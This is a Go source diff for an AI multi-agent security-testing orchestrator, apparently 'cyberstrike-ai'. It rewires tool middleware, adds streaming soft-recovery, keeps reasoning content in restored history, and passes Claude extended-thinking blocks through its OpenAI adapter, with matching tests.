zap.String("scope", "sub_agent"),
|
||||
zap.String("agent", id),
|
||||
zap.Int("tool_names", len(subNames)),
|
||||
zap.Int("mounted_tool_names", len(mountedNames)),
|
||||
zap.Bool("has_tool_search", hasToolSearch),
|
||||
zap.Bool("tool_search_middleware", subToolSearchActive),
|
||||
)
|
||||
}
|
||||
sa, err := adk.NewChatModelAgent(ctx, &adk.ChatModelAgentConfig{
|
||||
@@ -290,8 +282,8 @@ func RunDeepAgent(
|
||||
Tools: subToolsForCfg,
|
||||
UnknownToolsHandler: einomcp.UnknownToolReminderHandler(),
|
||||
ToolCallMiddlewares: []compose.ToolMiddleware{
|
||||
{Invokable: hitlToolCallMiddleware()},
|
||||
{Invokable: softRecoveryToolCallMiddleware()},
|
||||
hitlToolCallMiddleware(),
|
||||
softRecoveryToolMiddleware(),
|
||||
},
|
||||
},
|
||||
EmitInternalEvents: true,
|
||||
@@ -316,6 +308,8 @@ func RunDeepAgent(
|
||||
return nil, fmt.Errorf("多代理主 summarization 中间件: %w", err)
|
||||
}
|
||||
|
||||
modelFacingTrace := newModelFacingTraceHolder()
|
||||
|
||||
// 与 deep.Config.Name / supervisor 主代理 Name 一致。
|
||||
orchestratorName := "cyberstrike-deep"
|
||||
orchDescription := "Coordinates specialist agents and MCP tools for authorized security testing."
|
||||
@@ -335,23 +329,26 @@ func RunDeepAgent(
|
||||
orchDescription = d
|
||||
}
|
||||
}
|
||||
orchInstruction = injectToolNamesOnlyInstruction(ctx, orchInstruction, mainTools)
|
||||
|
||||
mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, toolOutputChunk, toolInvokeNotify, orchestratorName)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
mainToolsForCfg, mainOrchestratorPre, mainToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, logger)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
orchInstruction = injectToolNamesOnlyInstruction(ctx, orchInstruction, mainTools, mainToolSearchActive)
|
||||
if logger != nil {
|
||||
mainNames := collectToolNames(ctx, mainTools)
|
||||
mountedNames := collectToolNames(ctx, mainToolsForCfg)
|
||||
hasToolSearch := false
|
||||
for _, n := range mainNames {
|
||||
if strings.EqualFold(strings.TrimSpace(n), "tool_search") {
|
||||
hasToolSearch = true
|
||||
break
|
||||
}
|
||||
}
|
||||
logger.Info("eino tool-name injection",
|
||||
zap.String("scope", "orchestrator"),
|
||||
zap.String("orchestration", orchMode),
|
||||
zap.Int("tool_names", len(mainNames)),
|
||||
zap.Int("mounted_tool_names", len(mountedNames)),
|
||||
zap.Bool("has_tool_search", hasToolSearch),
|
||||
zap.Bool("tool_search_middleware", mainToolSearchActive),
|
||||
)
|
||||
}
|
||||
|
||||
@@ -378,7 +375,14 @@ func RunDeepAgent(
|
||||
var deepShell filesystem.StreamingShell
|
||||
if einoLoc != nil && einoFSTools {
|
||||
deepBackend = einoLoc
|
||||
deepShell = einoLoc
|
||||
deepShell = &einoStreamingShellWrap{
|
||||
inner: einoLoc,
|
||||
invokeNotify: toolInvokeNotify,
|
||||
einoAgentName: orchestratorName,
|
||||
outputChunk: toolOutputChunk,
|
||||
recordMonitor: einoExecMonitor,
|
||||
toolTimeoutMinutes: agentToolTimeoutMinutes(appCfg),
|
||||
}
|
||||
}
|
||||
|
||||
// noNestedTaskMiddleware 必须在最外层(最先拦截),防止 skill 或其他中间件内部触发 task 调用绕过检测。
|
||||
@@ -393,9 +397,13 @@ func RunDeepAgent(
|
||||
deepHandlers = append(deepHandlers, einoSkillMW)
|
||||
}
|
||||
deepHandlers = append(deepHandlers, mainSumMw)
|
||||
deepHandlers = append(deepHandlers, newOrphanToolPrunerMiddleware(logger, "deep_orchestrator"))
|
||||
if teleMw := newEinoModelInputTelemetryMiddleware(logger, appCfg.OpenAI.Model, conversationID, "deep_orchestrator"); teleMw != nil {
|
||||
deepHandlers = append(deepHandlers, teleMw)
|
||||
}
|
||||
if capMw := newModelFacingTraceMiddleware(modelFacingTrace); capMw != nil {
|
||||
deepHandlers = append(deepHandlers, capMw)
|
||||
}
|
||||
|
||||
supHandlers := []adk.ChatModelAgentMiddleware{}
|
||||
if len(mainOrchestratorPre) > 0 {
|
||||
@@ -405,17 +413,21 @@ func RunDeepAgent(
|
||||
supHandlers = append(supHandlers, einoSkillMW)
|
||||
}
|
||||
supHandlers = append(supHandlers, mainSumMw)
|
||||
supHandlers = append(supHandlers, newOrphanToolPrunerMiddleware(logger, "supervisor_orchestrator"))
|
||||
if teleMw := newEinoModelInputTelemetryMiddleware(logger, appCfg.OpenAI.Model, conversationID, "supervisor_orchestrator"); teleMw != nil {
|
||||
supHandlers = append(supHandlers, teleMw)
|
||||
}
|
||||
if capMw := newModelFacingTraceMiddleware(modelFacingTrace); capMw != nil {
|
||||
supHandlers = append(supHandlers, capMw)
|
||||
}
|
||||
|
||||
mainToolsCfg := adk.ToolsConfig{
|
||||
ToolsNodeConfig: compose.ToolsNodeConfig{
|
||||
Tools: mainToolsForCfg,
|
||||
UnknownToolsHandler: einomcp.UnknownToolReminderHandler(),
|
||||
ToolCallMiddlewares: []compose.ToolMiddleware{
|
||||
{Invokable: hitlToolCallMiddleware()},
|
||||
{Invokable: softRecoveryToolCallMiddleware()},
|
||||
hitlToolCallMiddleware(),
|
||||
softRecoveryToolMiddleware(),
|
||||
},
|
||||
},
|
||||
EmitInternalEvents: true,
|
||||
@@ -433,7 +445,7 @@ func RunDeepAgent(
|
||||
// 构建 filesystem 中间件(与 Deep sub-agent 一致)
|
||||
var peFsMw adk.ChatModelAgentMiddleware
|
||||
if einoSkillMW != nil && einoFSTools && einoLoc != nil {
|
||||
peFsMw, err = subAgentFilesystemMiddleware(ctx, einoLoc)
|
||||
peFsMw, err = subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, "executor", einoExecMonitor, agentToolTimeoutMinutes(appCfg), toolOutputChunk)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("plan_execute filesystem 中间件: %w", err)
|
||||
}
|
||||
@@ -453,8 +465,11 @@ func RunDeepAgent(
|
||||
ExecPreMiddlewares: mainOrchestratorPre,
|
||||
SkillMiddleware: einoSkillMW,
|
||||
FilesystemMiddleware: peFsMw,
|
||||
ModelFacingTrace: modelFacingTrace,
|
||||
PlannerReplannerRewriteHandlers: []adk.ChatModelAgentMiddleware{
|
||||
mainSumMw,
|
||||
// 孤儿 tool 消息兜底:必须挂在 summarization 之后、telemetry 之前。
|
||||
newOrphanToolPrunerMiddleware(logger, "plan_execute_planner_replanner"),
|
||||
newEinoModelInputTelemetryMiddleware(logger, appCfg.OpenAI.Model, conversationID, "plan_execute_planner_replanner_rewrite"),
|
||||
},
|
||||
})
|
||||
@@ -542,95 +557,100 @@ func RunDeepAgent(
|
||||
}
|
||||
|
||||
return runEinoADKAgentLoop(ctx, &einoADKRunLoopArgs{
|
||||
OrchMode: orchMode,
|
||||
OrchestratorName: orchestratorName,
|
||||
ConversationID: conversationID,
|
||||
Progress: progress,
|
||||
Logger: logger,
|
||||
SnapshotMCPIDs: snapshotMCPIDs,
|
||||
StreamsMainAssistant: streamsMainAssistant,
|
||||
EinoRoleTag: einoRoleTag,
|
||||
CheckpointDir: ma.EinoMiddleware.CheckpointDir,
|
||||
McpIDsMu: &mcpIDsMu,
|
||||
McpIDs: &mcpIDs,
|
||||
DA: da,
|
||||
OrchMode: orchMode,
|
||||
OrchestratorName: orchestratorName,
|
||||
ConversationID: conversationID,
|
||||
Progress: progress,
|
||||
Logger: logger,
|
||||
SnapshotMCPIDs: snapshotMCPIDs,
|
||||
StreamsMainAssistant: streamsMainAssistant,
|
||||
EinoRoleTag: einoRoleTag,
|
||||
CheckpointDir: ma.EinoMiddleware.CheckpointDir,
|
||||
McpIDsMu: &mcpIDsMu,
|
||||
McpIDs: &mcpIDs,
|
||||
FilesystemMonitorAgent: ag,
|
||||
FilesystemMonitorRecord: recorder,
|
||||
ToolInvokeNotify: toolInvokeNotify,
|
||||
DA: da,
|
||||
ModelFacingTrace: modelFacingTrace,
|
||||
EinoCallbacks: &ma.EinoCallbacks,
|
||||
EmptyResponseMessage: "(Eino multi-agent orchestration completed but no assistant text was captured. Check process details or logs.) " +
|
||||
"(Eino 多代理编排已完成,但未捕获到助手文本输出。请查看过程详情或日志。)",
|
||||
}, baseMsgs)
|
||||
}
|
||||
|
||||
func chatToolCallsToSchema(tcs []agent.ToolCall) []schema.ToolCall {
|
||||
if len(tcs) == 0 {
|
||||
return nil
|
||||
}
|
||||
out := make([]schema.ToolCall, 0, len(tcs))
|
||||
for _, tc := range tcs {
|
||||
if strings.TrimSpace(tc.ID) == "" {
|
||||
continue
|
||||
}
|
||||
argsStr := ""
|
||||
if tc.Function.Arguments != nil {
|
||||
b, err := json.Marshal(tc.Function.Arguments)
|
||||
if err == nil {
|
||||
argsStr = string(b)
|
||||
}
|
||||
}
|
||||
typ := tc.Type
|
||||
if typ == "" {
|
||||
typ = "function"
|
||||
}
|
||||
out = append(out, schema.ToolCall{
|
||||
ID: tc.ID,
|
||||
Type: typ,
|
||||
Function: schema.FunctionCall{
|
||||
Name: tc.Function.Name,
|
||||
Arguments: argsStr,
|
||||
},
|
||||
})
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
// historyToMessages 将轨迹恢复的 ChatMessage 转为 Eino ADK 消息:**不裁剪条数、不按 token 预算截断**,
|
||||
// 并保留 user / assistant(含仅 tool_calls)/ tool,与库中 last_react 轨迹一致。
|
||||
func historyToMessages(history []agent.ChatMessage, appCfg *config.Config, mwCfg *config.MultiAgentEinoMiddlewareConfig) []adk.Message {
|
||||
_ = appCfg
|
||||
_ = mwCfg
|
||||
if len(history) == 0 {
|
||||
return nil
|
||||
}
|
||||
// Keep a bounded tail first; then enforce a token budget.
|
||||
const maxHistoryMessages = 200
|
||||
start := 0
|
||||
if len(history) > maxHistoryMessages {
|
||||
start = len(history) - maxHistoryMessages
|
||||
}
|
||||
raw := make([]adk.Message, 0, len(history[start:]))
|
||||
for _, h := range history[start:] {
|
||||
switch h.Role {
|
||||
raw := make([]adk.Message, 0, len(history))
|
||||
for _, h := range history {
|
||||
role := strings.ToLower(strings.TrimSpace(h.Role))
|
||||
switch role {
|
||||
case "user":
|
||||
if strings.TrimSpace(h.Content) != "" {
|
||||
raw = append(raw, schema.UserMessage(h.Content))
|
||||
}
|
||||
case "assistant":
|
||||
if strings.TrimSpace(h.Content) == "" && len(h.ToolCalls) > 0 {
|
||||
toolSchema := chatToolCallsToSchema(h.ToolCalls)
|
||||
hasRC := strings.TrimSpace(h.ReasoningContent) != ""
|
||||
if len(toolSchema) > 0 || strings.TrimSpace(h.Content) != "" || hasRC {
|
||||
am := schema.AssistantMessage(h.Content, toolSchema)
|
||||
if hasRC {
|
||||
am.ReasoningContent = strings.TrimSpace(h.ReasoningContent)
|
||||
}
|
||||
raw = append(raw, am)
|
||||
}
|
||||
case "tool":
|
||||
if strings.TrimSpace(h.ToolCallID) == "" && strings.TrimSpace(h.Content) == "" {
|
||||
continue
|
||||
}
|
||||
if strings.TrimSpace(h.Content) != "" {
|
||||
raw = append(raw, schema.AssistantMessage(h.Content, nil))
|
||||
var opts []schema.ToolMessageOption
|
||||
if tn := strings.TrimSpace(h.ToolName); tn != "" {
|
||||
opts = append(opts, schema.WithToolName(tn))
|
||||
}
|
||||
raw = append(raw, schema.ToolMessage(h.Content, h.ToolCallID, opts...))
|
||||
default:
|
||||
continue
|
||||
}
|
||||
}
|
||||
if len(raw) == 0 {
|
||||
return raw
|
||||
}
|
||||
maxTotal := 120000
|
||||
modelName := "gpt-4o"
|
||||
if appCfg != nil {
|
||||
if appCfg.OpenAI.MaxTotalTokens > 0 {
|
||||
maxTotal = appCfg.OpenAI.MaxTotalTokens
|
||||
}
|
||||
if m := strings.TrimSpace(appCfg.OpenAI.Model); m != "" {
|
||||
modelName = m
|
||||
}
|
||||
}
|
||||
ratio := 0.35
|
||||
if mwCfg != nil {
|
||||
ratio = mwCfg.HistoryInputBudgetRatioEffective()
|
||||
}
|
||||
budget := int(float64(maxTotal) * ratio)
|
||||
if budget < 4096 {
|
||||
budget = 4096
|
||||
}
|
||||
tc := agent.NewTikTokenCounter()
|
||||
outRev := make([]adk.Message, 0, len(raw))
|
||||
used := 0
|
||||
for i := len(raw) - 1; i >= 0; i-- {
|
||||
msg := raw[i]
|
||||
n, err := tc.Count(modelName, string(msg.Role)+"\n"+msg.Content)
|
||||
if err != nil {
|
||||
n = (len(msg.Content) + 3) / 4
|
||||
}
|
||||
if n <= 0 {
|
||||
n = 1
|
||||
}
|
||||
if used+n > budget {
|
||||
break
|
||||
}
|
||||
used += n
|
||||
outRev = append(outRev, msg)
|
||||
}
|
||||
out := make([]adk.Message, 0, len(outRev))
|
||||
for i := len(outRev) - 1; i >= 0; i-- {
|
||||
out = append(out, outRev[i])
|
||||
}
|
||||
return out
|
||||
return raw
|
||||
}
|
||||
|
||||
// mergeStreamingToolCallFragments 将流式多帧的 ToolCall 按 index 合并 arguments(与 schema.concatToolCalls 行为一致)。
|
||||
|
||||
@@ -0,0 +1,22 @@
|
||||
package multiagent
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"cyberstrike-ai/internal/agent"
|
||||
)
|
||||
|
||||
func TestHistoryToMessagesPreservesReasoningContent(t *testing.T) {
|
||||
h := []agent.ChatMessage{
|
||||
{Role: "user", Content: "u"},
|
||||
{Role: "assistant", Content: "c", ReasoningContent: "r1", ToolCalls: []agent.ToolCall{{ID: "t1", Type: "function", Function: agent.FunctionCall{Name: "f", Arguments: map[string]interface{}{}}}}},
|
||||
}
|
||||
msgs := historyToMessages(h, nil, nil)
|
||||
if len(msgs) != 2 {
|
||||
t.Fatalf("len=%d", len(msgs))
|
||||
}
|
||||
am := msgs[1]
|
||||
if am.ReasoningContent != "r1" || am.Content != "c" {
|
||||
t.Fatalf("got reasoning=%q content=%q", am.ReasoningContent, am.Content)
|
||||
}
|
||||
}
|
||||
@@ -8,6 +8,7 @@ import (
|
||||
"strings"
|
||||
|
||||
"github.com/cloudwego/eino/compose"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
)
|
||||
|
||||
// softRecoveryToolCallMiddleware returns an InvokableToolMiddleware that catches
|
||||
@@ -16,8 +17,9 @@ import (
|
||||
// returned to the LLM. This allows the model to self-correct within the same
|
||||
// iteration rather than crashing the entire graph and requiring a full replay.
|
||||
//
|
||||
// Without this middleware, a JSON parse failure in any tool's InvokableRun propagates
|
||||
// as a hard error through the Eino ToolsNode → [NodeRunError] → ev.Err, which
|
||||
// Without Invokable (+ Streamable where applicable) registration, a JSON parse failure
|
||||
// in InvokableRun / StreamableRun propagates as a hard error through the Eino ToolsNode
|
||||
// → [NodeRunError] → ev.Err, which
|
||||
// either triggers the full-replay retry loop (expensive) or terminates the run
|
||||
// entirely once retries are exhausted. With it, the LLM simply sees an error message
|
||||
// in the tool result and can adjust its next tool call accordingly.
|
||||
@@ -39,6 +41,44 @@ func softRecoveryToolCallMiddleware() compose.InvokableToolMiddleware {
|
||||
}
|
||||
}
|
||||
|
||||
// softRecoveryStreamableToolCallMiddleware mirrors softRecoveryToolCallMiddleware for
|
||||
// tools that implement StreamableTool only (e.g. Eino ADK filesystem execute).
|
||||
// Eino applies Invokable vs Streamable middleware to disjoint code paths in ToolsNode;
|
||||
// registering only Invokable leaves streaming tools uncovered — empty/malformed JSON
|
||||
// then fails inside [LocalStreamFunc] before the inner endpoint runs.
|
||||
func softRecoveryStreamableToolCallMiddleware() compose.StreamableToolMiddleware {
|
||||
return func(next compose.StreamableToolEndpoint) compose.StreamableToolEndpoint {
|
||||
return func(ctx context.Context, input *compose.ToolInput) (*compose.StreamToolOutput, error) {
|
||||
out, err := next(ctx, input)
|
||||
if err == nil {
|
||||
return out, nil
|
||||
}
|
||||
if !isSoftRecoverableToolError(err) {
|
||||
return out, err
|
||||
}
|
||||
toolName := ""
|
||||
args := ""
|
||||
if input != nil {
|
||||
toolName = input.Name
|
||||
args = input.Arguments
|
||||
}
|
||||
msg := buildSoftRecoveryMessage(toolName, args, err)
|
||||
return &compose.StreamToolOutput{
|
||||
Result: schema.StreamReaderFromArray([]string{msg}),
|
||||
}, nil
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// softRecoveryToolMiddleware returns a ToolMiddleware with both Invokable and Streamable
|
||||
// soft recovery (same semantics as hitlToolCallMiddleware bundling).
|
||||
func softRecoveryToolMiddleware() compose.ToolMiddleware {
|
||||
return compose.ToolMiddleware{
|
||||
Invokable: softRecoveryToolCallMiddleware(),
|
||||
Streamable: softRecoveryStreamableToolCallMiddleware(),
|
||||
}
|
||||
}
|
||||
|
||||
// isSoftRecoverableToolError determines whether a tool execution error should be
|
||||
// silently converted to a tool-result message rather than crashing the graph.
|
||||
//
|
||||
|
||||
@@ -4,6 +4,8 @@ import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"io"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"github.com/cloudwego/eino/compose"
|
||||
@@ -108,6 +110,39 @@ func TestSoftRecoveryToolCallMiddleware_PassesThrough(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestSoftRecoveryStreamableToolCallMiddleware_LocalStreamFuncJSONError(t *testing.T) {
|
||||
mw := softRecoveryStreamableToolCallMiddleware()
|
||||
next := func(ctx context.Context, input *compose.ToolInput) (*compose.StreamToolOutput, error) {
|
||||
return nil, errors.New(`[LocalStreamFunc] failed to unmarshal arguments in json, toolName=execute, err="Syntax error no sources available, the input json is empty`)
|
||||
}
|
||||
wrapped := mw(next)
|
||||
out, err := wrapped(context.Background(), &compose.ToolInput{
|
||||
Name: "execute",
|
||||
Arguments: "",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("expected nil error (soft recovery), got: %v", err)
|
||||
}
|
||||
if out == nil || out.Result == nil {
|
||||
t.Fatal("expected stream result")
|
||||
}
|
||||
var sb strings.Builder
|
||||
for {
|
||||
chunk, rerr := out.Result.Recv()
|
||||
if errors.Is(rerr, io.EOF) {
|
||||
break
|
||||
}
|
||||
if rerr != nil {
|
||||
t.Fatalf("recv: %v", rerr)
|
||||
}
|
||||
sb.WriteString(chunk)
|
||||
}
|
||||
text := sb.String()
|
||||
if !containsAll(text, "[Tool Error]", "execute", "JSON") {
|
||||
t.Fatalf("recovery message missing expected content: %s", text)
|
||||
}
|
||||
}
|
||||
|
||||
func TestSoftRecoveryToolCallMiddleware_ConvertsJSONError(t *testing.T) {
|
||||
mw := softRecoveryToolCallMiddleware()
|
||||
next := func(ctx context.Context, input *compose.ToolInput) (*compose.ToolOutput, error) {
|
||||
|
||||
@@ -9,6 +9,9 @@ package openai
|
||||
// Stream: Claude SSE (event: content_block_delta / message_delta) → OpenAI SSE 格式
|
||||
// Auth: Bearer → x-api-key
|
||||
// Tools: OpenAI tools[] → Claude tools[] (input_schema)
|
||||
//
|
||||
// Extended thinking: 顶层 `thinking` 从 OpenAI 请求体透传;响应中 `thinking` block 映射为
|
||||
// `reasoning_content`(可读前缀 + 内部 JSON 尾缀以保留 signature,供多轮工具续跑;UI 用 openai.DisplayReasoningContent 剥离)。
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
@@ -38,6 +41,7 @@ type claudeRequest struct {
|
||||
Messages []claudeMessage `json:"messages"`
|
||||
Tools []claudeTool `json:"tools,omitempty"`
|
||||
Stream bool `json:"stream,omitempty"`
|
||||
Thinking json.RawMessage `json:"thinking,omitempty"`
|
||||
}
|
||||
|
||||
type claudeMessage struct {
|
||||
@@ -76,6 +80,10 @@ type claudeContentBlock struct {
|
||||
// text block
|
||||
Text string `json:"text,omitempty"`
|
||||
|
||||
// thinking block (extended thinking)
|
||||
Thinking string `json:"thinking,omitempty"`
|
||||
Signature string `json:"signature,omitempty"`
|
||||
|
||||
// tool_use block (assistant 返回)
|
||||
ID string `json:"id,omitempty"`
|
||||
Name string `json:"name,omitempty"`
|
||||
@@ -176,7 +184,13 @@ func convertOpenAIToClaude(payload interface{}) (*claudeRequest, error) {
|
||||
|
||||
// tool_calls (assistant 消息中包含工具调用)
|
||||
if role == "assistant" {
|
||||
rc, _ := mm["reasoning_content"].(string)
|
||||
_, thinkingReplay := parseClaudeReasoningAssistantBlocks(rc)
|
||||
|
||||
var blocks []claudeContentBlock
|
||||
for _, tb := range thinkingReplay {
|
||||
blocks = append(blocks, tb)
|
||||
}
|
||||
if content != "" {
|
||||
blocks = append(blocks, claudeContentBlock{Type: "text", Text: content})
|
||||
}
|
||||
@@ -290,6 +304,13 @@ func convertOpenAIToClaude(payload interface{}) (*claudeRequest, error) {
|
||||
}
|
||||
}
|
||||
|
||||
// Extended thinking (Anthropic top-level); merged from Eino ExtraFields / admin extras.
|
||||
if th, ok := oai["thinking"]; ok && th != nil {
|
||||
if raw, err := json.Marshal(th); err == nil && len(raw) > 0 && string(raw) != "null" {
|
||||
req.Thinking = json.RawMessage(raw)
|
||||
}
|
||||
}
|
||||
|
||||
return req, nil
|
||||
}
|
||||
|
||||
@@ -318,9 +339,12 @@ func claudeToOpenAIResponseJSON(claudeBody []byte) ([]byte, error) {
|
||||
|
||||
var textContent string
|
||||
var toolCalls []interface{}
|
||||
var thinkingBlocks []claudeContentBlock
|
||||
|
||||
for _, block := range cr.Content {
|
||||
switch block.Type {
|
||||
case "thinking":
|
||||
thinkingBlocks = append(thinkingBlocks, block)
|
||||
case "text":
|
||||
textContent += block.Text
|
||||
case "tool_use":
|
||||
@@ -344,6 +368,18 @@ func claudeToOpenAIResponseJSON(claudeBody []byte) ([]byte, error) {
|
||||
if len(toolCalls) > 0 {
|
||||
message["tool_calls"] = toolCalls
|
||||
}
|
||||
if len(thinkingBlocks) > 0 {
|
||||
var parts []string
|
||||
for _, tb := range thinkingBlocks {
|
||||
if strings.TrimSpace(tb.Thinking) != "" {
|
||||
parts = append(parts, tb.Thinking)
|
||||
}
|
||||
}
|
||||
rc := appendClaudeReasoningRoundTrip(strings.Join(parts, "\n\n"), thinkingBlocks)
|
||||
if rc != "" {
|
||||
message["reasoning_content"] = rc
|
||||
}
|
||||
}
|
||||
|
||||
choice := map[string]interface{}{
|
||||
"index": 0,
|
||||
@@ -499,6 +535,7 @@ func (c *Client) claudeChatCompletionStream(ctx context.Context, payload interfa
|
||||
|
||||
reader := bufio.NewReader(resp.Body)
|
||||
var full strings.Builder
|
||||
fullText := ""
|
||||
|
||||
for {
|
||||
line, readErr := reader.ReadString('\n')
|
||||
@@ -531,9 +568,14 @@ func (c *Client) claudeChatCompletionStream(ctx context.Context, payload interfa
|
||||
if deltaType == "text_delta" {
|
||||
text, _ := delta["text"].(string)
|
||||
if text != "" {
|
||||
full.WriteString(text)
|
||||
var textOut string
|
||||
fullText, textOut = normalizeStreamingDelta(fullText, text)
|
||||
if textOut == "" {
|
||||
continue
|
||||
}
|
||||
full.WriteString(textOut)
|
||||
if onDelta != nil {
|
||||
if err := onDelta(text); err != nil {
|
||||
if err := onDelta(textOut); err != nil {
|
||||
return full.String(), err
|
||||
}
|
||||
}
|
||||
@@ -603,6 +645,7 @@ func (c *Client) claudeChatCompletionStreamWithToolCalls(
|
||||
|
||||
reader := bufio.NewReader(resp.Body)
|
||||
var full strings.Builder
|
||||
fullText := ""
|
||||
finishReason := ""
|
||||
|
||||
// 追踪当前正在构建的 content blocks
|
||||
@@ -665,9 +708,14 @@ func (c *Client) claudeChatCompletionStreamWithToolCalls(
|
||||
if deltaType == "text_delta" {
|
||||
text, _ := delta["text"].(string)
|
||||
if text != "" {
|
||||
full.WriteString(text)
|
||||
var textOut string
|
||||
fullText, textOut = normalizeStreamingDelta(fullText, text)
|
||||
if textOut == "" {
|
||||
continue
|
||||
}
|
||||
full.WriteString(textOut)
|
||||
if onContentDelta != nil {
|
||||
if err := onContentDelta(text); err != nil {
|
||||
if err := onContentDelta(textOut); err != nil {
|
||||
return full.String(), nil, finishReason, err
|
||||
}
|
||||
}
|
||||
@@ -889,8 +937,16 @@ func (rt *claudeRoundTripper) RoundTrip(req *http.Request) (*http.Response, erro
|
||||
|
||||
reader := bufio.NewReader(resp.Body)
|
||||
blockToToolIndex := make(map[int]int)
|
||||
blockIndexToType := make(map[int]string)
|
||||
nextToolIndex := 0
|
||||
|
||||
type thinkingAcc struct {
|
||||
text strings.Builder
|
||||
sig strings.Builder
|
||||
}
|
||||
thinkingByIndex := make(map[int]*thinkingAcc)
|
||||
var finishedThinking []claudeContentBlock
|
||||
|
||||
for {
|
||||
line, readErr := reader.ReadString('\n')
|
||||
if readErr != nil {
|
||||
@@ -935,6 +991,11 @@ func (rt *claudeRoundTripper) RoundTrip(req *http.Request) (*http.Response, erro
|
||||
blockIdx := int(blockIdxFlt)
|
||||
cb, _ := event["content_block"].(map[string]interface{})
|
||||
bt, _ := cb["type"].(string)
|
||||
blockIndexToType[blockIdx] = bt
|
||||
|
||||
if bt == "thinking" {
|
||||
thinkingByIndex[blockIdx] = &thinkingAcc{}
|
||||
}
|
||||
|
||||
if bt == "tool_use" {
|
||||
id, _ := cb["id"].(string)
|
||||
@@ -974,7 +1035,35 @@ func (rt *claudeRoundTripper) RoundTrip(req *http.Request) (*http.Response, erro
|
||||
delta, _ := event["delta"].(map[string]interface{})
|
||||
dt, _ := delta["type"].(string)
|
||||
|
||||
if dt == "text_delta" {
|
||||
if dt == "thinking_delta" {
|
||||
tPart, _ := delta["thinking"].(string)
|
||||
if tPart != "" {
|
||||
if acc := thinkingByIndex[blockIdx]; acc != nil {
|
||||
acc.text.WriteString(tPart)
|
||||
}
|
||||
oaiChunk := map[string]interface{}{
|
||||
"choices": []map[string]interface{}{
|
||||
{
|
||||
"delta": map[string]interface{}{
|
||||
"reasoning_content": tPart,
|
||||
},
|
||||
},
|
||||
},
|
||||
}
|
||||
b, _ := json.Marshal(oaiChunk)
|
||||
if !writeLine("data: " + string(b) + "\n\n") {
|
||||
pw.Close()
|
||||
return
|
||||
}
|
||||
}
|
||||
} else if dt == "signature_delta" {
|
||||
sigPart, _ := delta["signature"].(string)
|
||||
if sigPart != "" {
|
||||
if acc := thinkingByIndex[blockIdx]; acc != nil {
|
||||
acc.sig.WriteString(sigPart)
|
||||
}
|
||||
}
|
||||
} else if dt == "text_delta" {
|
||||
text, _ := delta["text"].(string)
|
||||
oaiChunk := map[string]interface{}{
|
||||
"choices": []map[string]interface{}{
|
||||
@@ -1019,6 +1108,21 @@ func (rt *claudeRoundTripper) RoundTrip(req *http.Request) (*http.Response, erro
|
||||
}
|
||||
}
|
||||
|
||||
case "content_block_stop":
|
||||
blockIdxFlt, _ := event["index"].(float64)
|
||||
blockIdx := int(blockIdxFlt)
|
||||
bt := blockIndexToType[blockIdx]
|
||||
if bt == "thinking" {
|
||||
if acc := thinkingByIndex[blockIdx]; acc != nil {
|
||||
finishedThinking = append(finishedThinking, claudeContentBlock{
|
||||
Type: "thinking",
|
||||
Thinking: acc.text.String(),
|
||||
Signature: acc.sig.String(),
|
||||
})
|
||||
delete(thinkingByIndex, blockIdx)
|
||||
}
|
||||
}
|
||||
|
||||
case "message_delta":
|
||||
d, _ := event["delta"].(map[string]interface{})
|
||||
if sr, ok := d["stop_reason"].(string); ok {
|
||||
@@ -1039,6 +1143,25 @@ func (rt *claudeRoundTripper) RoundTrip(req *http.Request) (*http.Response, erro
|
||||
}
|
||||
|
||||
case "message_stop":
|
||||
if len(finishedThinking) > 0 {
|
||||
suffix := appendClaudeReasoningRoundTrip("", finishedThinking)
|
||||
if strings.TrimSpace(suffix) != "" {
|
||||
oaiChunk := map[string]interface{}{
|
||||
"choices": []map[string]interface{}{
|
||||
{
|
||||
"delta": map[string]interface{}{
|
||||
"reasoning_content": suffix,
|
||||
},
|
||||
},
|
||||
},
|
||||
}
|
||||
b, _ := json.Marshal(oaiChunk)
|
||||
if !writeLine("data: " + string(b) + "\n\n") {
|
||||
pw.Close()
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
writeLine("data: [DONE]\n\n")
|
||||
pw.Close()
|
||||
return
|
||||
|
||||
@@ -0,0 +1,81 @@
|
||||
package openai
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// claudeReasoningRoundTripSep separates human-readable reasoning from a JSON payload of
|
||||
// Anthropic thinking blocks (with signatures) for multi-turn extended thinking + tools.
|
||||
// Not shown in UI (see DisplayReasoningContent).
|
||||
const claudeReasoningRoundTripSep = "\n---CSAI_CLAUDE_THINKING_BLOCKS---\n"
|
||||
|
||||
// DisplayReasoningContent returns reasoning text suitable for the UI (strips internal
|
||||
// Claude round-trip JSON suffix). Safe for DeepSeek/plain reasoning strings (no-op).
|
||||
func DisplayReasoningContent(s string) string {
|
||||
s = strings.TrimSpace(s)
|
||||
if s == "" {
|
||||
return ""
|
||||
}
|
||||
i := strings.LastIndex(s, claudeReasoningRoundTripSep)
|
||||
if i < 0 {
|
||||
return s
|
||||
}
|
||||
return strings.TrimSpace(s[:i])
|
||||
}
|
||||
|
||||
func appendClaudeReasoningRoundTrip(display string, blocks []claudeContentBlock) string {
|
||||
var payload []map[string]string
|
||||
for _, b := range blocks {
|
||||
if b.Type != "thinking" {
|
||||
continue
|
||||
}
|
||||
payload = append(payload, map[string]string{
|
||||
"type": b.Type,
|
||||
"thinking": b.Thinking,
|
||||
"signature": b.Signature,
|
||||
})
|
||||
}
|
||||
if len(payload) == 0 {
|
||||
return strings.TrimSpace(display)
|
||||
}
|
||||
js, err := json.Marshal(payload)
|
||||
if err != nil {
|
||||
